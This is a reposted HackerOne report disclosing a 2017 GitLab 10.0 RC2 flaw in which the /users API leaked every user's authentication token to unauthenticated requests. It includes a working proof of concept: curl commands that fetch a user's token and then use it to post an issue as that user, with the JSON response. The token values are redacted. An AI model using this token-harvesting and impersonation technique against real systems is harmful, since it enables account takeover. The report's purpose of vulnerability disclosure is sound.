GitLab 10.0 RC2 returning _all_ user data in the /users API endpoint, including tokens

From a HackerOne report:

---

Title: all private tokens are leaked to an unauthenticated attacker

Scope: None

Weakness: Privilege Escalation

Severity: Critical

Link: https://hackerone.com/reports/268794

Date: 2017-09-15 22:13:20 +0000

By: @rpearl

Details: Using the api, one can obtain the authentication token for any user on gitlab:

$ curl -s --request GET https://gitlab.com/api/v4/users/951422 | jq '.authentication_token'
"[redacted]"

We can then use this token to impersonate any user to perform any action they can perform: $ curl --request POST --header "PRIVATE-TOKEN: [redacted]" https://gitlab.com/api/v4/projects/3831210/issues?title=owned

{"id":6843690,"iid":4,"project_id":3831210,"title":"owned","description":"","state":"opened","created_at":"2017-09-15T21:58:06.342Z","updated_at":"2017-09-15T21:58:06.342Z","labels":[],"milestone":null,"assignees":[],"author":{"id":951422,"name":"Andrew Drake","username":"adrake","state":"active","avatar_url":"https://secure.gravatar.com/avatar/5cd00179addefbca6d635845534a1ee6?s=80&d=identicon","web_url":"https://gitlab.com/adrake"},"assignee":null,"user_notes_count":0,"upvotes":0,"downvotes":0,"due_date":null,"confidential":false,"weight":null,"web_url":"https://gitlab.com/karmiclabs/slabricator/issues/4","time_stats":{"time_estimate":0,"total_time_spent":0,"human_time_estimate":null,"human_total_time_spent":null},"_links":{"self":"http://gitlab.com/api/v4/projects/3831210/issues/4","notes":"http://gitlab.com/api/v4/projects/3831210/issues/4/notes","award_emoji":"http://gitlab.com/api/v4/projects/3831210/issues/4/award_emoji","project":"http://gitlab.com/api/v4/projects/3831210"},"subscribed":true}

Timeline: